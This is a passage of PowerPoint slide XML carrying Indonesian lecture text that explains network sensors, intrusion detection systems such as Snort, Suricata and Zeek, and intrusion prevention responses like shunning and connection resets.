              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>benar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Tergantung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ukuran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>satu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> sensor </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memantau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>utama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jalur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Deteksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Intrusi</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Lalu </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lintas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ditangkap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>setiap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> sensor </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ditransfer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> host </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjalankan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>deteksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>intrusi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (IDS), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Snort (snort.org), Suricata (suricata-ids.org), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Zeek/Bro (zeek.org). Ketika </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>trafik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cocok</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tanda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>deteksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, IDS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memunculkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peringatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>entri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> log </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tetapi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memblokir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> host </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Jenis sensor </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pasif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memperlambat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>trafik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terdeteksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyerang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>IDS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengidentifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencatat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> host dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serta</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendeteksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>upaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menebak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> kata </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sandi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemindaian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> port, worm, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pintu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>belakang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>paket</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sesi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cacat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pelanggaran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kebijakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lainnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Pencegahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Intrusi</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pencegahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>intrusi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (IPS) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mampu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memberikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>respons</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aktif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. IPS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memindai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lalu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lintas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencocokkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tanda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pendeteksian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dikonfigurasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>otomatis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bertindak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menghentikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Tanggapan-tanggapan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berikut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>merupakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tanggapan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>umum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Memblokir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>trafik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sesuai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>baik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sementara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>permanen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Ini </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> shunning.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Mengatur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ulang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>koneksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tetapi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memblokir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alamat</a:t>
            </a:r>
            <a:r>
